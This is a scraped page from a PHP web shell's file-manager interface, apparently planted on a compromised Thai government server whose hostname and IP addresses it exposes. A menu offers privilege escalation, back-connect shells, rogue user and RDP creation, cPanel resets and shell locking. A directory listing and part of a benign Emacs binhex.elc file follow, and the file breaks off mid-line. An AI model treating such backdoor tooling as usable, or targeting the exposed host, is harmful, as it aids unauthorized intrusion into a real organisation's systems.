Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
mail /
[ HOME SHELL ]
Name
Size
Permission
Action
binhex.elc
9.01
KB
-rw-r--r--
blessmail.el
2.51
KB
-rw-r--r--
emacsbug.elc
7.55
KB
-rw-r--r--
feedmail.elc
79.59
KB
-rw-r--r--
footnote.elc
21.09
KB
-rw-r--r--
hashcash.elc
10.81
KB
-rw-r--r--
mail-extr.elc
33.9
KB
-rw-r--r--
mail-hist.elc
13.74
KB
-rw-r--r--
mail-utils.elc
9.55
KB
-rw-r--r--
mailabbrev.elc
13.96
KB
-rw-r--r--
mailalias.elc
13.52
KB
-rw-r--r--
mailclient.elc
3.56
KB
-rw-r--r--
mailheader.elc
5.92
KB
-rw-r--r--
mailpost.elc
2.3
KB
-rw-r--r--
metamail.elc
4.44
KB
-rw-r--r--
mspools.elc
7.25
KB
-rw-r--r--
reporter.elc
9.65
KB
-rw-r--r--
rfc2368.elc
2.46
KB
-rw-r--r--
rfc822.elc
5.71
KB
-rw-r--r--
rmail-spam-filter.elc
13.24
KB
-rw-r--r--
rmail.elc
113.93
KB
-rw-r--r--
rmailedit.elc
8.83
KB
-rw-r--r--
rmailkwd.elc
5.12
KB
-rw-r--r--
rmailmm.elc
11.05
KB
-rw-r--r--
rmailmsc.elc
1.56
KB
-rw-r--r--
rmailout.elc
15.73
KB
-rw-r--r--
rmailsort.elc
6.33
KB
-rw-r--r--
rmailsum.elc
52.51
KB
-rw-r--r--
sendmail.elc
51.72
KB
-rw-r--r--
smtpmail.elc
21.58
KB
-rw-r--r--
supercite.elc
58.99
KB
-rw-r--r--
uce.elc
7.66
KB
-rw-r--r--
undigest.elc
7.88
KB
-rw-r--r--
unrmail.elc
4.69
KB
-rw-r--r--
uudecode.elc
6.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : binhex.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:04:20 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/mail/binhex.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`binhex.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\300\301\302\303!\203\f \303\202 \304\"\210\305\306\307\310\311\312\311\313&\207" [defalias binhex-char-int fboundp char-int identity custom-declare-group binhex nil "Decoding of BinHex (binary-to-hexadecimal) data." :group mail news] 8) #@185 *Non-nil value should be a string that names a binhex decoder. The program should expect to read binhex data on its standard input and write the converted data to its standard output. (custom-declare-variable 'binhex-decoder-program '"hexbin" '(#$ . -861) :type 'string :group 'binhex) #@77 *List of command line flags passed to the command `binhex-decoder-program'. (custom-declare-variable 'binhex-decoder-switches ''("-d") '(#$ . -1153) :group 'binhex :type '(repeat string)) #@31 *Use external binhex program. (custom-declare-variable 'binhex-use-external '(executable-find binhex-decoder-program) '(#$ . -1347) :version "22.1" :group 'binhex :type 'boolean) (byte-code "\301B\302\303!\207" [current-load-list binhex-alphabet-decoding-alist (lambda (#1=#:defconst-tmp-var) (defconst binhex-alphabet-decoding-alist #1#)) ((33 . 0) (34 . 1) (35 . 2) (36 . 3) (37 . 4) (38 . 5) (39 . 6) (40 . 7) (41 . 8) (42 . 9) (43 . 10) (44 . 11) (45 . 12) (48 . 13) (49 . 14) (50 . 15) (51 . 16) (52 . 17) (53 . 18) (54 . 19) (56 . 20) (57 . 21) (64 . 22) (65 . 23) (66 . 24) (67 . 25) (68 . 26) (69 . 27) (70 . 28) (71 . 29) (72 . 30) (73 . 31) (74 . 32) (75 . 33) (76 . 34) (77 . 35) (78 . 36) (80 . 37) (81 . 38) (82 . 39) (83 . 40) (84 . 41) (85 . 42) (86 . 43) (88 . 44) (89 . 45) (90 . 46) (91 . 47) (96 . 48) (97 . 49) (98 . 50) (99 . 51) (100 . 52) (101 . 53) (102 . 54) (104 . 55) (105 . 56) (106 . 57) (107 . 58) (108 . 59) (109 . 60) (112 . 61) (113 . 62) (114 . 63))] 2) (defalias 'binhex-char-map #[(char) " \236A\207" [char binhex-alphabet-decoding-alist] 2]) (byte-code "\302B\303\304!\210\305B\306\307!\210\310B\311\312!\210\313B\314\313!\204<